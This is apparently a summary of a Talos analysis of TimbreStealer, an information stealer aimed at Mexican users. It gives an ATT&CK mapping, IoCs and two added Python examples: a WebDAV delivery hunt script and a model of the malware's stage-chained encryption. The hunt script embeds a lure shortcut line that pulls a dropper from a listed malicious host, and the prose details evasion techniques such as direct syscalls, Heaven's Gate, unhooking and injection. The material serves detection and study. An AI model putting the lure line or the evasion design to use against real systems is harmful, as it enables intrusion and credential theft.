TimbreStealer campaign targets Mexican users with financial lures

Cisco Talos identified a Mexico-focused spam campaign that delivers a new obfuscated information stealer named TimbreStealer via compromised websites and WebDAV-based .url lures, using geofencing to serve payloads only to Mexican victims. The malware uses layered encrypted modules, direct syscalls including Heaven’s Gate transitions, and extensive anti-analysis checks to decrypt, load and persist a multi-stage payload. #TimbreStealer #Mispadu

Keypoints

  • Distribution: Spam emails with Mexican tax (CFDI) invoice lures redirect victims to compromised sites hosting Zip archives; each archive contains a .url shortcut that pulls the initial dropper over WebDAV.
  • Geofencing: Payload hosts return a blank PDF for non-Mexico visitors; JavaScript on sites checks geolocation and browser before serving the malicious Zip.
  • Multi-stage, encrypted architecture: Initial packed EXE embeds a DLL in .data; stages are decrypted sequentially using a global key that is re-encrypted at each step to prevent shortcutting.
  • Direct syscalls & Heaven’s Gate: Loader builds a Zw* export hash table, issues direct system calls to avoid API hooks, and uses Heaven’s Gate to execute 64-bit syscalls from a 32-bit process.
  • Anti-analysis and system-of-interest checks: Modules verify language/timezone, debug/sandbox indicators, VM artifacts, mutexes, registry keys and browser artifacts before decrypting later stages.
  • Loader & execution: Custom shellcode loaders (x86/x64) load stripped DLLs, use ZwCreateThreadEx for execution, and attempt injection into preferred svchost.exe processes with a 32-bit fallback shellcode option.
  • Capabilities & persistence: The final payload is extracted from an ApplicationIcon.ico resource; it can harvest browser credentials and OS/WMI data, POST multipart data to its C2s, remove System Restore points, and persist via scheduled tasks, registry Run keys or Group Policy startup scripts.

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing Link – Spam emails carry tax-themed links that redirect to compromised pages serving the Zip lures (‘Spearphishing Link’)
  • [T1204.002] User Execution: Malicious File – The victim must open the Zip and the .url shortcut inside it to trigger the WebDAV download (‘Malicious File’)
  • [T1105] Ingress Tool Transfer – The initial dropper and later stages are fetched from compromised web hosts and a WebDAV server (‘Ingress Tool Transfer’)
  • [T1584.004] Compromise Infrastructure: Server – Compromised public websites host the landing pages, the geofencing JavaScript and the Zip archives; the page does not describe how the sites were compromised (‘Compromise Infrastructure: Server’)
  • [T1608.001] Stage Capabilities: Upload Malware – Zip lures and the dropper are staged under many rotating hostnames and per-link URL tokens; nothing on the page indicates a domain generation algorithm (‘Upload Malware’)
  • [T1071.001] Application Layer Protocol: Web Protocols – Payload downloads use HTTP and WebDAV, and C2 traffic is multipart HTTP POST (‘Web Protocols’)
  • [T1036.005] Masquerading: Match Legitimate Name or Location – Zip and .url names and icons mimic invoices and PDFs (CFDI_*.zip, FACTURA_*.zip) (‘Match Legitimate Name or Location’)
  • [T1218.011] System Binary Proxy Execution: Rundll32 – The .url shortcut has rundll32 load davclnt.dll to perform the WebDAV download, and iernonce.dll is also loaded through rundll32 later in the execution flow (‘Rundll32’)
  • [T1027.009] Obfuscated Files or Information: Embedded Payloads – Stages are embedded, encrypted, in the .data section, in resource blobs and in an ApplicationIcon.ico resource (‘Embedded Payloads’)
  • [T1027.002] Obfuscated Files or Information: Software Packing – The first-stage executable is packed and submodules are decompressed and decrypted at runtime (‘Software Packing’)
  • [T1027] Obfuscated Files or Information – Decrypted stages have their MZ/PE headers wiped in memory, and the global decryption key is re-encrypted after every stage so stages cannot be decrypted out of order (‘Obfuscated Files or Information’)
  • [T1140] Deobfuscate/Decode Files or Information – Multiple runtime decryption and decompression rounds produce each executable module (‘Deobfuscate/Decode Files or Information’)
  • [T1106] Native API – Sensitive calls go through a hashed table of ntdll Zw* exports and direct syscalls rather than the documented Win32 API (‘Native API’)
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Direct syscalls and Heaven’s Gate sidestep user-mode API hooks, and in-memory system DLLs are overwritten with clean copies to remove hooks that are already in place (‘Disable or Modify Tools’)
  • [T1497.001] Virtualization/Sandbox Evasion: System Checks – VM strings, mutexes, registry keys, timezone and desktop window counts are checked before the next stage is decrypted (‘System Checks’)
  • [T1497.002] Virtualization/Sandbox Evasion: User Activity Based Checks – Browser artifacts and other signs of real use are required before execution continues (‘User Activity Based Checks’)
  • [T1497.003] Virtualization/Sandbox Evasion: Time Based Evasion – Time-based sandbox/VM evasion checks are used before progressing (‘Time Based Evasion’)
  • [T1622] Debugger Evasion – Debugger and hook checks gate the decryption of later stages (‘Debugger Evasion’)
  • [T1614.001] System Location Discovery: System Language Discovery – System language and timezone are checked to confirm a Mexican system of interest (‘System Language Discovery’)
  • [T1055.002] Process Injection: Portable Executable Injection – The 64-bit DLL is injected into a preferred svchost.exe instance (those hosting DcomLaunch, Power, BrokerInfrastructure, LSM or Schedule), with a 32-bit shellcode fallback (‘Portable Executable Injection’)
  • [T1055] Process Injection – Two-stage shellcode loaders run injected code via ZwCreateThreadEx and modified thread contexts; the page describes no hollowing of a suspended process image (‘Process Injection’)
  • [T1082] System Information Discovery – WMI and registry queries collect OS, hardware, installed-application and profile data (‘System Information Discovery’)
  • [T1047] Windows Management Instrumentation – WMI is the collection interface for the system inventory (‘Windows Management Instrumentation’)
  • [T1012] Query Registry – Registry keys are read for the anti-analysis checks, for the decryption rounds tied to registry state and for persistence (‘Query Registry’)
  • [T1555.003] Credentials from Password Stores: Credentials from Web Browsers – Browser credential databases (SQLite) are harvested (‘Credentials from Web Browsers’)
  • [T1083] File and Directory Discovery – Targeted file types and directories are scanned (‘File and Directory Discovery’)
  • [T1041] Exfiltration Over C2 Channel – Collected data is sent as multipart HTTP POSTs to the C2 endpoints (‘Exfiltration Over C2 Channel’)
  • [T1490] Inhibit System Recovery – System Restore points are removed or altered (‘Inhibit System Recovery’)
  • [T1053.005] Scheduled Task/Job: Scheduled Task – Scheduled tasks are registered through the ITaskService COM interface (‘Scheduled Task’)
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Run and RunOnce entries are written (via reg.exe), with a Group Policy startup script as an optional alternative (‘Registry Run Keys / Startup Folder’)
  • [T1112] Modify Registry – Registry values are written for persistence and read back as part of the environment checks (‘Modify Registry’)

Indicators of Compromise

  • [Domains] Drop sites and C2 – pdf85[.]miramantolama[.]com/factura/74f871b7ca1977, suscripcion24[.]facturasonlinemx[.]com/factura/d6a6f8208ed508, and many other compromised Spanish-themed domains.
  • [IPs] Hosting infrastructure – 159[.]89[.]50[.]225 (WebDAV host), 69[.]64[.]35[.]1 (~route host), and multiple other IPs listed in the research.
  • [File hashes] Dropper and embedded binaries – 010b48762a033f91b32e315ebcefb8423d2b20019516fa8f2f3d54d57d221bdb, 024f3c591d44499afb8f477865c557fc15164ab0f35594e0cfdfa76245459762, and many more dropper hashes.
  • [File names] Notable filenames and artifacts – Cecujujajofubo475.dll (installed DLL), ApplicationIcon.ico (embedded final payload), CFDI_930209.zip / FACTURA_560208.zip (.zip lures) and .url shortcut filenames.

The campaign begins with targeted spam carrying Mexican tax-themed lures (CFDI invoices, facturas). Victims are redirected to compromised websites whose JavaScript checks the visitor’s region and browser; a visitor from Mexico is served a Zip archive named like CFDI_*.zip or FACTURA_*.zip that contains a .url internet shortcut, while a visitor from anywhere else gets a benign blank PDF. The .url shortcut points at a WebDAV share, so opening it makes Windows fetch the initial TimbreStealer dropper over WebDAV (the download runs through rundll32 and davclnt.dll).
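A hunt for this delivery chain, as an added example (not Talos code): it parses a .url shortcut to flag WebDAV-backed targets, then scans process-creation events for the rundll32/davclnt.dll mount and for a binary launched from the share. The shortcut body, paths, file names and events are constructed for the example; only the host 159.89.50.225 is taken from the IoC list above.

```python
"""Hunt for the WebDAV .url delivery chain.

Added example, not Talos code.  It does two things:
  1. parses an Internet Shortcut (.url) and flags a target that makes the
     Windows WebClient mount a remote WebDAV share instead of opening a page;
  2. scans process-creation events for the rundll32 davclnt.dll,DavSetCookie
     child that such a mount produces, and for binaries started from a
     host@80 UNC path or a DavWWWRoot path.
The .url body and the events are constructed; only the host 159.89.50.225 is
from the IoC list, the paths and file names are made up.
"""
import re
from configparser import ConfigParser
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed lure.  "host@80" (or "host@SSL") after the leading slashes is
# what makes Windows route the path to the WebDAV redirector rather than SMB.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=file://159.89.50.225@80/facturas/dropper.exe
IconFile=C:\\Windows\\System32\\shell32.dll
IconIndex=1
"""

# file://host@port/... or \\host@port\... with a numeric port or "SSL"
WEBDAV_TARGET = re.compile(
    r"^(?:file:)?[\\/]{2}(?P<host>[^\\/@]+)@(?P<port>\d+|ssl)(?=[\\/]|$)",
    re.IGNORECASE,
)
# Explicit WebDAV path component, e.g. \\host\DavWWWRoot\share\file.exe
DAVWWWROOT = re.compile(r"[\\/]DavWWWRoot(?=[\\/]|$)", re.IGNORECASE)
# The rundll32 invocation the WebClient service uses when a share is mounted
DAVSETCOOKIE = re.compile(r"davclnt\.dll\s*,\s*DavSetCookie", re.IGNORECASE)


def parse_url_shortcut(text: str) -> Optional[str]:
    """Return the URL= target of an Internet Shortcut, or None."""
    cp = ConfigParser(interpolation=None)   # targets may contain '%'
    cp.read_string(text)
    return cp.get("InternetShortcut", "URL", fallback=None)


def classify_target(target: str) -> Optional[str]:
    """Describe why a shortcut target or image path is WebDAV-backed, or None."""
    target = target.strip()
    m = WEBDAV_TARGET.match(target)
    if m:
        return f"webdav share {m['host']}@{m['port']}"
    if DAVWWWROOT.search(target):
        return "webdav share (DavWWWRoot)"
    return None


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def hunt_process_events(events: List[ProcEvent]) -> List[Tuple[str, ProcEvent]]:
    """Tag events that show a WebDAV mount or a binary executed from one."""
    hits: List[Tuple[str, ProcEvent]] = []
    for ev in events:
        if ev.image.lower().endswith("rundll32.exe") and DAVSETCOOKIE.search(ev.command_line):
            hits.append(("webdav_mount", ev))
        elif classify_target(ev.image):
            hits.append(("exec_from_webdav", ev))
    return hits


# Constructed process-creation events: the mount, the dropper launch and a
# benign rundll32 use that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\System32\davclnt.dll,DavSetCookie 159.89.50.225@80 "
              r"http://159.89.50.225/facturas/dropper.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"\\159.89.50.225@80\facturas\dropper.exe",
              r"\\159.89.50.225@80\facturas\dropper.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    print("shortcut target:", classify_target(parse_url_shortcut(SAMPLE_URL_FILE)))
    for kind, ev in hunt_process_events(SAMPLE_EVENTS):
        print(kind, "->", ev.image, "|", ev.command_line)
```

Feed it Sysmon event 1 or EDR process-creation records: the pivot is a rundll32 child carrying davclnt.dll,DavSetCookie shortly after a .zip or .url is opened, followed by an image path on the same host@80 share. Where WebDAV is not needed, disabling the WebClient service or blocking outbound WebDAV at the proxy removes the delivery path entirely.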

On execution the packed first-stage executable extracts an embedded DLL from its .data section and enumerates the Zw* exports of ntdll.dll to build a hash table that it uses for direct syscalls. Sensitive APIs are invoked through those syscalls rather than through the user-mode wrappers that EDR and sandbox monitors hook, and on 64-bit systems the 32-bit loader uses a Heaven’s Gate transition to issue 64-bit syscalls directly, so hooks on the user-mode API never see the calls. The loader wipes the MZ/PE headers of decrypted stages, runs the stripped DLLs through a custom PE/shellcode loader, and relies on a global decryption key that is re-encrypted at each stage, so any deviation from the expected execution path (a skipped stage, a failed check) breaks every later decryption.
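The stage chaining described above, as an added model (not Talos code): a global key that is replaced after every stage, so a stage decrypts only if every earlier stage was decrypted on the expected path. The real cipher and key schedule are not given on the page, so a SHA-256 keystream and a SHA-256 key update stand in for them, and the stage contents and context strings are constructed. The model also binds each key update to runtime context, the way the page says the installed DLLs tie extra encryption rounds to the parent process, which is why the installer stage below never decrypts when the expected parent changes.

```python
"""Model of TimbreStealer's stage chaining: a global key that is replaced
("re-encrypted") after every stage, so a stage can only be decrypted after
every earlier stage has been decrypted on the expected path.

Added example, not Talos code.  The real cipher and key schedule are not
on the page; SHA-256 stands in for both, and the stages and contexts below
are constructed.
"""
import hashlib
from typing import List, Optional

MAGIC = b"STG"   # loader sanity marker at the start of each plaintext stage


def keystream(key: bytes, length: int) -> bytes:
    """Counter-mode keystream from SHA-256 (stand-in for the real cipher)."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hashlib.sha256(key + block.to_bytes(4, "little")).digest()
        block += 1
    return bytes(out[:length])


def xor_bytes(data: bytes, ks: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, ks))


def next_key(key: bytes, stage_plain: bytes, context: bytes) -> bytes:
    """Replace the global key with one bound to the stage just decrypted and
    to runtime context (the page mentions rounds tied to the parent process
    and registry values).  Skipping a stage or running under a different
    parent yields a different key, and every later stage becomes unreadable."""
    return hashlib.sha256(key + stage_plain + context).digest()


def build_chain(initial_key: bytes, stages: List[bytes], contexts: List[bytes]) -> List[bytes]:
    """Attacker side: encrypt stages so they only decrypt in order."""
    blobs, key = [], initial_key
    for i, (payload, ctx) in enumerate(zip(stages, contexts)):
        plain = MAGIC + bytes([i]) + payload
        blobs.append(xor_bytes(plain, keystream(key, len(plain))))
        key = next_key(key, plain, ctx)
    return blobs


def decrypt_stage(key: bytes, blob: bytes) -> Optional[bytes]:
    """One loader step; None when the key was not produced by the expected path."""
    plain = xor_bytes(blob, keystream(key, len(blob)))
    return plain if plain.startswith(MAGIC) else None


def run_chain(initial_key: bytes, blobs: List[bytes], contexts: List[bytes]) -> List[bytes]:
    """Loader side: decrypt stages in order, stopping at the first failure."""
    out, key = [], initial_key
    for blob, ctx in zip(blobs, contexts):
        plain = decrypt_stage(key, blob)
        if plain is None:
            break
        out.append(plain[len(MAGIC) + 1:])
        key = next_key(key, plain, ctx)
    return out


# Constructed stages and the context each key update expects (here the name
# of the process that must be hosting the loader by that point).
INITIAL_KEY = hashlib.sha256(b"example global key").digest()
STAGES = [b"orchestrator", b"anti-vm module", b"installer"]
CONTEXTS = [b"parent=explorer.exe", b"parent=svchost.exe", b"parent=svchost.exe"]
BLOBS = build_chain(INITIAL_KEY, STAGES, CONTEXTS)


def demo():
    in_order = run_chain(INITIAL_KEY, BLOBS, CONTEXTS)
    # Jumping straight to the installer with the initial key fails.
    skipped = decrypt_stage(INITIAL_KEY, BLOBS[2])
    # Sample run under a debugger instead of the expected parent: stages 1
    # and 2 still decrypt, the installer never does.
    wrong_parent = run_chain(INITIAL_KEY, BLOBS,
                             [CONTEXTS[0], b"parent=x64dbg.exe", CONTEXTS[2]])
    return in_order, skipped, wrong_parent


if __name__ == "__main__":
    in_order, skipped, wrong_parent = demo()
    print("in order:    ", in_order)
    print("skip to 3:   ", skipped)
    print("wrong parent:", wrong_parent)
```

The practical consequence for analysis is that a memory dump taken at one stage does not hand you the later ones: the later blobs are only decryptable with a key that exists solely in a process that walked the whole path with the expected environment, so detonation has to satisfy every check or the decryption has to be emulated step by step.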

The orchestrator and the DLLs it loads perform layered anti-analysis and system-of-interest checks (system language and timezone, debugger and API hooks, desktop and window counts, VM strings, mutexes, specific registry keys and browser usage). Only if the checks pass are the submodules (x86/x64 shellcode loaders, anti-VM, decompression modules and the installer) decrypted and executed, typically via ZwCreateThreadEx, and injected into a preferred svchost.exe instance (the loader looks for the ones hosting the DcomLaunch, Power, BrokerInfrastructure, LSM or Schedule services), with a 32-bit fallback shellcode option.

The installed DLLs add further protections: TLS callbacks, extra encryption rounds keyed to the parent process and to registry values, and overwriting in-memory DLLs with clean copies to remove user-mode hooks, before extracting the final payload from an ApplicationIcon.ico resource. Capabilities observed or implied in the final payload include harvesting browser credentials from their SQLite stores, scanning for targeted file types and directories, collecting WMI and registry system information, sending multipart HTTP POSTs to the C2 endpoints, and removing or altering System Restore artifacts. Persistence is achieved through scheduled tasks, Run key entries and, optionally, Group Policy startup scripts.

Read more: https://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/